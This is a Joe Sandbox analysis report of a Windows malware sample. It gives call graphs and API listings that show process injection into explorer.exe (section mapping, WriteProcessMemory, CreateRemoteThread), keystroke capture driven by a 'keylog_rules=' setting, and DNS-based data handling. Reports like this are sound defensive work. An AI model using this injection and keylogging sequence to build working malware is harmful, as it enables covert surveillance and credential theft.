                                                                                                                            callgraph 0 Function_005C355C 0->0 18 Function_005C30F0 0->18 21 Function_005C1B70 0->21 44 Function_005C1838 0->44 52 Function_005C3220 0->52 1 Function_005C1C58 2 Function_005C1254 3 Function_005C14D4 4 Function_005C1DD4 4->44 5 Function_005C2054 6 Function_005C18D0 5->6 10 Function_005C1F40 5->10 13 Function_005C18F8 5->13 20 Function_005C1E70 5->20 25 Function_005C1860 5->25 31 Function_005C2010 5->31 32 Function_005C188C 5->32 5->44 45 Function_005C1938 5->45 7 Function_005C1D50 7->44 8 Function_005CA048 39 Function_005CA00A 8->39 9 Function_005C25C4 12 Function_005C25FC 9->12 10->13 10->44 11 Function_005C4A41 14 Function_005C14F9 15 Function_005C2774 16 Function_005C2BF4 17 Function_005C1576 18->1 18->25 34 Function_005C1A88 18->34 36 Function_005C2508 18->36 18->44 19 Function_005C2B70 40 Function_005C1A04 19->40 19->44 22 Function_005C156C 23 Function_005C18E8 24 Function_005C24E0 25->21 26 Function_005C1560 27 Function_005C2860 27->15 27->21 53 Function_005C2620 27->53 28 Function_005C141D 29 Function_005C2418 29->5 29->25 29->44 30 Function_005C2E98 30->4 30->16 30->19 37 Function_005C2E08 30->37 30->40 46 Function_005C2CB8 30->46 31->40 32->44 33 Function_005C1508 35 Function_005C1C08 36->6 36->9 36->24 37->7 37->23 37->25 37->29 38 Function_005C3088 38->21 38->30 41 Function_005C1405 42 Function_005C1000 43 Function_005C2E80 46->25 46->44 54 Function_005C1D20 46->54 47 Function_005C1BB0 48 Function_005C14B2 49 Function_005C1C28 50 Function_005C9FAB 50->8 51 Function_005C45A7 52->21 52->27 52->35 52->44 52->45 52->47 52->49 55 Function_005C3020 55->21 55->30 56 Function_005C1822

                                                                                                                            Executed Functions

                                                                                                                            Function 005C355C Relevance: 1.6, APIs: 1, Instructions: 73nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 119 5c355c-5c356c call 5c1b70 122 5c35fc-5c3601 119->122 123 5c3572-5c35a5 call 5c1838 119->123 127 5c35a7 call 5c1838 123->127 128 5c35d1-5c35f6 NtUnmapViewOfSection 123->128 130 5c35ac-5c35c5 127->130 132 5c3608-5c3617 call 5c3220 128->132 133 5c35f8-5c35fa 128->133 130->128 139 5c3619-5c361c call 5c355c 132->139 140 5c3621-5c362a 132->140 133->122 135 5c3602-5c3607 call 5c30f0 133->135 135->132 139->140
                                                                                                                            APIs
                                                                                                                            • NtUnmapViewOfSection.NTDLL ref: 005C35D8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5c1000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: SectionUnmapView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 498011366-0
                                                                                                                            • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                            • Instruction ID: 322baffc1c02afe4287959af49104bc3d8baeffb05ba91e88e1e2bbfb6d2a77c
                                                                                                                            • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                                                                                                                            • Instruction Fuzzy Hash: 7C119430615E0D5FEB58BBF8989DB793BA0FB55301F54412EA419C76A1DA39CA40C741
                                                                                                                            Function 005C3220 Relevance: 7.7, APIs: 5, Instructions: 241processCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 5c3220-5c325b call 5c1838 3 5c3261-5c3273 CreateToolhelp32Snapshot 0->3 4 5c3549-5c3554 SleepEx 3->4 5 5c3279-5c328f Process32First 3->5 4->3 6 5c3538-5c353a 5->6 7 5c3294-5c32ac 6->7 8 5c3540-5c3543 CloseHandle 6->8 10 5c348c-5c3495 call 5c1bb0 7->10 11 5c32b2-5c32c6 7->11 8->4 15 5c352a-5c3532 Process32Next 10->15 16 5c349b-5c34a4 call 5c1c08 10->16 11->10 17 5c32cc-5c32e0 11->17 15->6 16->15 21 5c34aa-5c34b1 call 5c1c28 16->21 17->10 22 5c32e6-5c32fa 17->22 21->15 27 5c34b3-5c34c1 call 5c1b70 21->27 22->10 26 5c3300-5c3314 22->26 26->10 31 5c331a-5c332e 26->31 27->15 32 5c34c3-5c3525 call 5c1938 call 5c2860 call 5c1938 27->32 31->10 36 5c3334-5c3348 31->36 32->15 36->10 41 5c334e-5c3362 36->41 41->10 44 5c3368-5c337c 41->44 44->10 46 5c3382-5c3396 44->46 46->10 48 5c339c-5c33b0 46->48 48->10 50 5c33b6-5c33ca 48->50 50->10 52 5c33d0-5c33e4 50->52 52->10 54 5c33ea-5c33fe 52->54 54->10 56 5c3404-5c3418 54->56 56->10 58 5c341a-5c342e 56->58 58->10 60 5c3430-5c3444 58->60 60->10 62 5c3446-5c345a 60->62 62->10 64 5c345c-5c3470 62->64 64->10 66 5c3472-5c3486 64->66 66->10 66->15
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.4578892665.00000000005C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 005C1000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5c1000_explorer.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2482764027-0
                                                                                                                            • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                            • Instruction ID: 2b30515ccdb89e08f50fd30113119eb5ce4c3f53cf6f5398538fb0bf8443668d
                                                                                                                            • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                                                                                                                            • Instruction Fuzzy Hash: 628125312186098FEB1AEF54EC98FE6B7A1FB51741F54861EA443C7160EF78DA04CB81
                                                                                                                            Function 005CA048 Relevance: 4.7, APIs: 3, Instructions: 223memorylibraryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 68 5ca048-5ca04b 69 5ca055-5ca059 68->69 70 5ca05b-5ca063 69->70 71 5ca065 69->71 70->71 72 5ca04d-5ca053 71->72 73 5ca067 71->73 72->69 74 5ca06a-5ca071 73->74 76 5ca07d 74->76 77 5ca073-5ca07b 74->77 76->74 78 5ca07f-5ca082 76->78 77->76 79 5ca084-5ca092 78->79 80 5ca097-5ca0a4 78->80 81 5ca0ce-5ca0e9 79->81 82 5ca094-5ca095 79->82 90 5ca0be-5ca0cc call 5ca00a 80->90 91 5ca0a6-5ca0a8 80->91 83 5ca11a-5ca11d 81->83 82->80 85 5ca11f-5ca120 83->85 86 5ca122-5ca129 83->86 88 5ca101-5ca105 85->88 89 5ca12f-5ca133 86->89 92 5ca0eb-5ca0ee 88->92 93 5ca107-5ca10a 88->93 94 5ca135-5ca14e LoadLibraryA 89->94 95 5ca190-5ca1e4 VirtualProtect * 2 89->95 90->69 97 5ca0ab-5ca0b2 91->97 92->86 96 5ca0f0 92->96 93->86 98 5ca10c-5ca110 93->98 101 5ca14f-5ca156 94->101 99 5ca1e8-5ca1ed 95->99 103 5ca0f1-5ca0f5 96->103 114 5ca0bc 97->114 115 5ca0b4-5ca0ba 97->115 98->103 104 5ca112-5ca119 98->104 99->99 105 5ca1ef-5ca1fe 99->105 101->89 102 5ca158 101->102 107 5ca15a-5ca162 102->107 108 5ca164-5ca16c 102->108 103->88 109 5ca0f7-5ca0f9 103->109 104->83 112 5ca16e-5ca17a 107->112 108->112 109->88 113 5ca0fb-5ca0ff 109->113 117 5ca17c-5ca183 112->117 118 5ca185-5ca18f 112->118 113->88 113->93 114->90 114->97 115->114 117->101
                                                                                                                            APIs
                                                                                                                            • LoadLibraryA.KERNELBASE ref: 005CA147
                                                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 005CA1BB
                                                                                                                            • VirtualProtect.KERNELBASE ref: 005CA1D9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.4578892665.00000000005C7000.00000040.80000000.00040000.00000000.sdmp, Offset: 005C7000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5c7000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProtectVirtual$LibraryLoad
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 895956442-0
                                                                                                                            • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                            • Instruction ID: 7328117f6ba064af21b11ea2df17775bbb776b62b4758f3b362c0dec4fb05ce9
                                                                                                                            • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                                                                                                                            • Instruction Fuzzy Hash: 8D516A3135891D4ECB24AAB89CC8BB5BFD1F755329F18072ED48AC3285E659D846C383

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:9.6%
                                                                                                                            Dynamic/Decrypted Code Coverage:97.5%
                                                                                                                            Signature Coverage:18%
                                                                                                                            Total number of Nodes:322
                                                                                                                            Total number of Limit Nodes:4
                                                                                                                            execution_graph 1019 471581 1020 47158e 1019->1020 1021 471623 1020->1021 1022 4715a7 GlobalLock 1020->1022 1022->1021 1023 4715b5 1022->1023 1024 4715e4 1023->1024 1025 4715c0 1023->1025 1040 47293e 1024->1040 1026 4715c5 lstrlenW 1025->1026 1027 4715f2 1025->1027 1039 472a09 GetProcessHeap RtlAllocateHeap 1026->1039 1029 472724 VirtualQuery 1027->1029 1031 4715fb 1029->1031 1033 4715ff lstrlenW 1031->1033 1034 47161b GlobalUnlock 1031->1034 1032 4715d8 lstrcatW 1032->1027 1033->1034 1035 47160a 1033->1035 1034->1021 1047 4716b9 RtlEnterCriticalSection 1035->1047 1037 471614 1038 4729eb 3 API calls 1037->1038 1038->1034 1039->1032 1041 47294d lstrlen 1040->1041 1046 472982 1040->1046 1066 472a09 GetProcessHeap RtlAllocateHeap 1041->1066 1043 472963 MultiByteToWideChar 1044 47297b 1043->1044 1043->1046 1045 4729eb 3 API calls 1044->1045 1045->1046 1046->1027 1048 4716d2 lstrlenW 1047->1048 1049 4717ce RtlLeaveCriticalSection 1047->1049 1050 4716ed lstrlenW 1048->1050 1065 4717bd 1048->1065 1049->1037 1051 471702 1050->1051 1052 471723 1051->1052 1053 47174e GetForegroundWindow 1051->1053 1052->1065 1067 4717dc 1052->1067 1054 47175a GetWindowTextW 1053->1054 1053->1065 1056 471771 GetClassNameW 1054->1056 1057 47177a lstrcmpW 1054->1057 1056->1057 1059 4717bf lstrcatW 1057->1059 1060 47178b lstrcpyW 1057->1060 1058 47172f wsprintfW 1062 4717b6 1058->1062 1059->1065 1061 4717dc 4 API calls 1060->1061 1063 471798 wsprintfW 1061->1063 1064 4729eb 3 API calls 1062->1064 1063->1062 1064->1065 1065->1049 1066->1043 1070 472a09 GetProcessHeap RtlAllocateHeap 1067->1070 1069 4717ed GetLocalTime wsprintfW 1069->1058 1070->1069 771 479ae0 772 479ca4 771->772 773 479aeb 771->773 772->772 774 479bfa LoadLibraryA 773->774 778 479c3f VirtualProtect VirtualProtect 773->778 775 479c11 774->775 775->773 777 479c23 GetProcAddress 775->777 777->775 779 479c39 777->779 778->772 780 471000 781 471007 780->781 782 471010 780->782 784 471016 781->784 825 472724 VirtualQuery 784->825 787 471098 787->782 789 47102c RtlMoveMemory 790 471072 GetCurrentProcessId 789->790 791 47104d 789->791 795 471093 790->795 796 47109f 790->796 853 472a09 GetProcessHeap RtlAllocateHeap 791->853 793 471053 RtlMoveMemory 793->790 795->787 798 471096 795->798 828 4710a5 796->828 854 4713ae RtlZeroMemory VirtualQuery 798->854 799 4710a4 801 472a09 GetProcessHeap RtlAllocateHeap 799->801 802 4710bf 801->802 803 472a09 GetProcessHeap RtlAllocateHeap 802->803 804 4710cc wsprintfA 803->804 809 4710f3 804->809 805 47276d OpenFileMappingA MapViewOfFile 805->809 806 47129a Sleep 806->809 807 472841 lstrlen lstrlen 807->809 808 47275a UnmapViewOfFile CloseHandle 808->806 809->805 809->806 809->807 809->808 824 471148 809->824 810 472a09 GetProcessHeap RtlAllocateHeap 811 471150 RtlMoveMemory CreateToolhelp32Snapshot 810->811 812 471171 Process32First 811->812 811->824 814 47127e CloseHandle 812->814 815 47118d 812->815 813 4729eb VirtualQuery GetProcessHeap HeapFree 813->824 814->824 816 471190 CharLowerA 815->816 817 471266 Process32Next 816->817 818 4711ab lstrcmpiA 816->818 817->816 817->824 818->817 818->824 819 4712ae 16 API calls 819->824 820 4726c9 OpenProcess IsWow64Process IsWow64Process CloseHandle 820->824 821 472724 VirtualQuery 821->824 822 471208 lstrcmpiA 822->824 823 4718bf 30 API calls 823->824 824->809 824->810 824->813 824->814 824->817 824->819 824->820 824->821 824->822 824->823 826 47101e 825->826 826->787 827 472a09 GetProcessHeap RtlAllocateHeap 826->827 827->789 883 472a09 GetProcessHeap RtlAllocateHeap 828->883 830 4710bf 884 472a09 GetProcessHeap RtlAllocateHeap 830->884 832 4710cc wsprintfA 837 4710f3 832->837 834 47129a Sleep 834->837 835 472841 lstrlen lstrlen 835->837 837->834 837->835 852 471148 837->852 885 47276d OpenFileMappingA 837->885 950 47275a UnmapViewOfFile CloseHandle 837->950 839 471150 RtlMoveMemory CreateToolhelp32Snapshot 840 471171 Process32First 839->840 839->852 842 47127e CloseHandle 840->842 843 47118d 840->843 842->852 844 471190 CharLowerA 843->844 845 471266 Process32Next 844->845 846 4711ab lstrcmpiA 844->846 845->844 845->852 846->845 846->852 849 472724 VirtualQuery 849->852 850 471208 lstrcmpiA 850->852 852->837 852->842 852->845 852->849 852->850 888 472a09 GetProcessHeap RtlAllocateHeap 852->888 889 4712ae 852->889 908 4726c9 OpenProcess 852->908 914 4718bf 852->914 945 4729eb 852->945 853->793 855 4713e4 854->855 975 472a09 GetProcessHeap RtlAllocateHeap 855->975 857 471402 GetModuleFileNameA 976 472a09 GetProcessHeap RtlAllocateHeap 857->976 859 471418 GetCurrentProcessId wsprintfA 977 472799 CryptAcquireContextA 859->977 862 47145f RtlInitializeCriticalSection 982 472a09 GetProcessHeap RtlAllocateHeap 862->982 863 47151b 864 4729eb 3 API calls 863->864 866 471522 864->866 868 4729eb 3 API calls 866->868 867 47147f Sleep 983 4725f1 GetCurrentProcessId GetCurrentThreadId CreateToolhelp32Snapshot Thread32First 867->983 870 471529 RtlExitUserThread 868->870 881 471533 870->881 871 471496 GetModuleHandleA GetProcAddress 872 4714c6 GetModuleHandleA GetProcAddress 871->872 873 4714b5 871->873 875 4714ea GetModuleHandleA 872->875 876 4714d9 872->876 991 471f3a 873->991 1001 471e89 875->1001 878 471f3a 3 API calls 876->878 878->875 880 4725f1 10 API calls 882 471501 CreateThread CloseHandle 880->882 881->796 882->863 883->830 884->832 886 472794 885->886 887 472781 MapViewOfFile 885->887 886->837 887->886 888->839 890 4712c5 889->890 904 4713a4 889->904 890->904 951 4729bd VirtualAlloc 890->951 892 4712d9 lstrlen 952 472a09 GetProcessHeap RtlAllocateHeap 892->952 894 4712f0 906 471351 894->906 953 472841 lstrlen lstrlen 894->953 896 4729eb 3 API calls 905 471375 896->905 898 471353 RtlMoveMemory 903 472569 2 API calls 898->903 899 471329 RtlMoveMemory 955 472569 899->955 900 471399 959 4729ae VirtualFree 900->959 903->906 904->852 905->900 907 471388 PathMatchSpecA 905->907 906->896 907->900 907->905 909 4726e7 IsWow64Process 908->909 910 47271c 908->910 911 47270a 909->911 912 4726f8 IsWow64Process 909->912 910->852 913 472715 CloseHandle 911->913 912->911 912->913 913->910 915 472724 VirtualQuery 914->915 916 4718d9 915->916 917 4718eb OpenProcess 916->917 918 471b1c 916->918 917->918 919 471904 917->919 918->852 920 472724 VirtualQuery 919->920 921 47190b 920->921 921->918 922 471935 921->922 923 471919 NtSetInformationProcess 921->923 960 471b26 922->960 923->922 926 471b26 2 API calls 927 47197c 926->927 928 471b19 CloseHandle 927->928 929 471b26 2 API calls 927->929 928->918 930 4719a6 929->930 966 471bbd 930->966 933 471b26 2 API calls 934 4719d6 RtlMoveMemory RtlMoveMemory NtUnmapViewOfSection 933->934 935 471af4 CreateRemoteThread 934->935 936 471a2b 934->936 937 471b0b CloseHandle 935->937 938 471a31 CreateMutexA GetLastError 936->938 941 471a61 GetModuleHandleA GetProcAddress ReadProcessMemory 936->941 939 471b0d CloseHandle CloseHandle 937->939 938->936 940 471a4d CloseHandle Sleep 938->940 939->928 940->938 942 471a92 WriteProcessMemory 941->942 943 471aed 941->943 942->943 944 471abc CreateRemoteThread CloseHandle Sleep WriteProcessMemory 942->944 943->937 943->939 944->943 946 472724 VirtualQuery 945->946 947 4729f3 946->947 948 472a07 947->948 949 4729f7 GetProcessHeap HeapFree 947->949 948->852 949->948 950->834 951->892 952->894 954 47130c RtlZeroMemory 953->954 954->898 954->899 956 472577 lstrlen RtlMoveMemory 955->956 957 4725a1 955->957 956->957 957->894 959->904 961 471b3a 960->961 965 47195a 960->965 962 471b69 961->962 963 471b4a NtCreateSection 961->963 964 471b7e NtMapViewOfSection 962->964 962->965 963->962 964->965 965->926 967 471c06 966->967 968 471bd4 966->968 970 471c17 LoadLibraryA 967->970 972 471c69 967->972 974 471c47 GetProcAddress 967->974 969 471bd6 RtlMoveMemory 968->969 969->967 969->969 970->967 973 4719b6 NtUnmapViewOfSection 970->973 971 471c87 LdrProcessRelocationBlock 971->972 971->973 972->971 972->973 973->933 974->967 974->973 975->857 976->859 978 4727bf CryptCreateHash lstrlen CryptHashData CryptGetHashParam 977->978 979 471445 CreateMutexA GetLastError 977->979 980 472805 wsprintfA 978->980 979->862 979->863 980->980 981 472827 CryptDestroyHash CryptReleaseContext 980->981 981->979 982->867 984 472631 983->984 985 472681 CloseHandle 984->985 986 472671 Thread32Next 984->986 987 47263d OpenThread 984->987 985->871 986->984 988 472660 ResumeThread 987->988 989 472658 SuspendThread 987->989 990 472666 CloseHandle 988->990 989->990 990->986 992 471f44 991->992 1000 471fad 991->1000 992->1000 1010 471fea VirtualProtect 992->1010 994 471f5b 994->1000 1011 4729bd VirtualAlloc 994->1011 996 471f67 997 471f84 996->997 998 471f71 RtlMoveMemory 996->998 1012 471fea VirtualProtect 997->1012 998->997 1000->872 1002 472724 VirtualQuery 1001->1002 1003 471e93 1002->1003 1006 4714fa 1003->1006 1013 471ed8 1003->1013 1006->880 1008 471eba 1008->1006 1018 471fea VirtualProtect 1008->1018 1010->994 1011->996 1012->1000 1014 471e9e 1013->1014 1016 471eea 1013->1016 1014->1006 1017 471fea VirtualProtect 1014->1017 1015 471f04 lstrcmp 1015->1014 1015->1016 1016->1014 1016->1015 1017->1008 1018->1006 1071 47182d 1072 471838 RtlEnterCriticalSection lstrlenW 1071->1072 1073 4718a8 RtlLeaveCriticalSection Sleep 1072->1073 1079 471854 1072->1079 1073->1072 1076 4729eb VirtualQuery GetProcessHeap HeapFree 1076->1079 1079->1073 1079->1076 1080 4725a4 1079->1080 1086 47200d 1079->1086 1097 4729ae VirtualFree 1079->1097 1098 472a09 GetProcessHeap RtlAllocateHeap 1079->1098 1081 4725b9 CryptBinaryToStringA 1080->1081 1082 4725e8 1080->1082 1081->1082 1083 4725cc 1081->1083 1082->1079 1099 472a09 GetProcessHeap RtlAllocateHeap 1083->1099 1085 4725d7 CryptBinaryToStringA 1085->1082 1087 472023 lstrlen 1086->1087 1088 472030 1086->1088 1087->1088 1100 472a09 GetProcessHeap RtlAllocateHeap 1088->1100 1090 472038 lstrcat 1091 472074 1090->1091 1092 47206d lstrcat 1090->1092 1101 4720a1 1091->1101 1092->1091 1095 4729eb 3 API calls 1096 472097 1095->1096 1096->1079 1097->1079 1098->1079 1099->1085 1100->1090 1135 47240f 1101->1135 1105 4720ce 1140 47298a lstrlen MultiByteToWideChar 1105->1140 1107 4720dd 1141 4724cc RtlZeroMemory 1107->1141 1110 47212f RtlZeroMemory 1112 472164 1110->1112 1111 4729eb 3 API calls 1113 472084 1111->1113 1116 4723f1 1112->1116 1118 472192 1112->1118 1143 47243d 1112->1143 1113->1095 1115 4723d7 1115->1116 1117 4729eb 3 API calls 1115->1117 1116->1111 1117->1116 1118->1115 1152 472a09 GetProcessHeap RtlAllocateHeap 1118->1152 1120 472262 wsprintfW 1121 472288 1120->1121 1125 4722f5 1121->1125 1153 472a09 GetProcessHeap RtlAllocateHeap 1121->1153 1123 4722c2 wsprintfW 1123->1125 1124 4723b4 1126 4729eb 3 API calls 1124->1126 1125->1124 1154 472a09 GetProcessHeap RtlAllocateHeap 1125->1154 1128 4723c8 1126->1128 1128->1115 1129 4729eb 3 API calls 1128->1129 1129->1115 1130 472340 1131 4723ad 1130->1131 1155 4729bd VirtualAlloc 1130->1155 1132 4729eb 3 API calls 1131->1132 1132->1124 1134 47239a RtlMoveMemory 1134->1131 1136 472419 1135->1136 1137 4720c0 1135->1137 1138 472841 2 API calls 1136->1138 1139 472a09 GetProcessHeap RtlAllocateHeap 1137->1139 1138->1137 1139->1105 1140->1107 1142 4720ed 1141->1142 1142->1110 1142->1116 1145 47244a 1143->1145 1146 4724ab 1143->1146 1144 47244e DnsQuery_W 1144->1145 1145->1144 1145->1146 1147 47248d DnsFree inet_ntoa 1145->1147 1146->1118 1147->1145 1148 4724ad 1147->1148 1156 472a09 GetProcessHeap RtlAllocateHeap 1148->1156 1150 4724b7 1157 47298a lstrlen MultiByteToWideChar 1150->1157 1152->1120 1153->1123 1154->1130 1155->1134 1156->1150 1157->1146 1158 47162b 1159 47163c 1158->1159 1160 4716aa 1158->1160 1159->1160 1161 47164b GetKeyboardState 1159->1161 1161->1160 1162 47165c ToUnicode 1161->1162 1163 471684 1162->1163 1163->1160 1164 4716b9 19 API calls 1163->1164 1164->1160

                                                                                                                            Callgraph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            • Opacity -> Relevance
                                                                                                                            • Disassembly available
                                                                                                                            callgraph 0 Function_00472841 1 Function_004724CC 2 Function_004726C9 3 Function_0047255C 4 Function_004717DC 22 Function_00472A09 4->22 5 Function_0047275A 6 Function_00471ED8 7 Function_00471E66 42 Function_00471CBF 7->42 8 Function_00479AE0 9 Function_0047276D 10 Function_004729EB 30 Function_00472724 10->30 11 Function_00471FEA 12 Function_00472569 13 Function_004729E8 14 Function_004725F1 15 Function_00471581 15->10 15->22 15->30 43 Function_0047293E 15->43 48 Function_004716B9 15->48 16 Function_00471000 24 Function_00471016 16->24 17 Function_0047268F 18 Function_0047240F 18->0 19 Function_0047288D 20 Function_0047200D 20->10 20->22 32 Function_004720A1 20->32 21 Function_0047298A 23 Function_00471E89 23->6 23->11 23->30 24->0 24->2 24->5 24->9 24->10 24->17 24->19 24->22 29 Function_004710A5 24->29 24->30 34 Function_004712AE 24->34 35 Function_004726AE 24->35 36 Function_004713AE 24->36 41 Function_004718BF 24->41 25 Function_00472799 26 Function_00473627 27 Function_00471B26 28 Function_00471E26 28->42 29->0 29->2 29->5 29->9 29->10 29->17 29->19 29->22 29->30 29->34 29->35 29->41 31 Function_004725A4 31->22 32->1 32->10 32->18 32->19 32->21 32->22 44 Function_004729BD 32->44 46 Function_0047243D 32->46 33 Function_004729AE 34->0 34->3 34->10 34->12 34->22 34->33 34->44 36->10 36->14 36->22 36->23 36->25 47 Function_00471F3A 36->47 37 Function_0047182D 37->10 37->20 37->22 37->31 37->33 38 Function_0047162B 38->48 39 Function_00471FB4 39->28 40 Function_00471533 41->27 41->30 45 Function_00471BBD 41->45 43->10 43->22 46->21 46->22 47->7 47->11 47->39 47->44 48->4 48->10

                                                                                                                            Executed Functions

                                                                                                                            Function 00471016 Relevance: 35.2, APIs: 14, Strings: 6, Instructions: 193stringsleepprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,004729F3,-00000001,0047128C), ref: 00472731
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00471038
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0047106C
                                                                                                                            • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00471075
                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00471010), ref: 0047107B
                                                                                                                            • wsprintfA.USER32 ref: 004710E7
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00471155
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00471160
                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 0047117F
                                                                                                                            • CharLowerA.USER32(?), ref: 00471199
                                                                                                                            • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 004711B5
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00471212
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0047126C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0047127F
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 0047129F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MemoryMove$HeapProcessProcess32lstrcmpi$AllocateCharCloseCreateCurrentFirstHandleLowerNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtualwsprintf
                                                                                                                            • String ID: %s%s$0-8wP,8w$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                            • API String ID: 3206029838-1920841371
                                                                                                                            • Opcode ID: 787651e8b4702a3a48997a1e6be7bf90d2092727d5f6dee79a5c9481f94e633c
                                                                                                                            • Instruction ID: 49fc6f7850c0ceac07304724a1b84891b4078f6b536d3b0d563e0ede0517dd86
                                                                                                                            • Opcode Fuzzy Hash: 787651e8b4702a3a48997a1e6be7bf90d2092727d5f6dee79a5c9481f94e633c
                                                                                                                            • Instruction Fuzzy Hash: A55136302003405BC714BF79DD449FB37A9EB44705F00863EB94D972B2EA788A8596AE
                                                                                                                            Function 004710A5 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 151stringsleepprocessCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00472A09: GetProcessHeap.KERNEL32(00000008,0000A000,004710BF), ref: 00472A0C
                                                                                                                              • Part of subcall function 00472A09: RtlAllocateHeap.NTDLL(00000000), ref: 00472A13
                                                                                                                            • wsprintfA.USER32 ref: 004710E7
                                                                                                                              • Part of subcall function 0047276D: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 00472777
                                                                                                                              • Part of subcall function 0047276D: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,004710FE), ref: 00472789
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,0000000C,-00000001), ref: 00471155
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00471160
                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 0047117F
                                                                                                                            • CharLowerA.USER32(?), ref: 00471199
                                                                                                                            • lstrcmpiA.KERNEL32(?,explorer.exe), ref: 004711B5
                                                                                                                            • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00471212
                                                                                                                            • Process32Next.KERNEL32(00000000,00000128), ref: 0047126C
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0047127F
                                                                                                                            • Sleep.KERNELBASE(000003E8), ref: 0047129F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000012.00000002.4579461534.0000000000471000.00000040.80000000.00040000.00000000.sdmp, Offset: 00471000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_18_2_471000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHeapProcess32lstrcmpi$AllocateCharCloseCreateFirstHandleLowerMappingMemoryMoveNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                            • String ID: %s%s$explorer.exe$keylog_rules=$microsoftedgecp.exe$|:|
                                                                                                                            • API String ID: 3018447944-2805246637
                                                                                                                            • Opcode ID: e0646f17fe3737e08e7413e7499c1963b65d8cb5172cd33f363e64b7b1bb79c5
                                                                                                                            • Instruction ID: ecf29531ae940c8a5d5b0e8f51eb46552479e305d73e02d238df061ce512e0bd
                                                                                                                            • Opcode Fuzzy Hash: e0646f17fe3737e08e7413e7499c1963b65d8cb5172cd33f363e64b7b1bb79c5
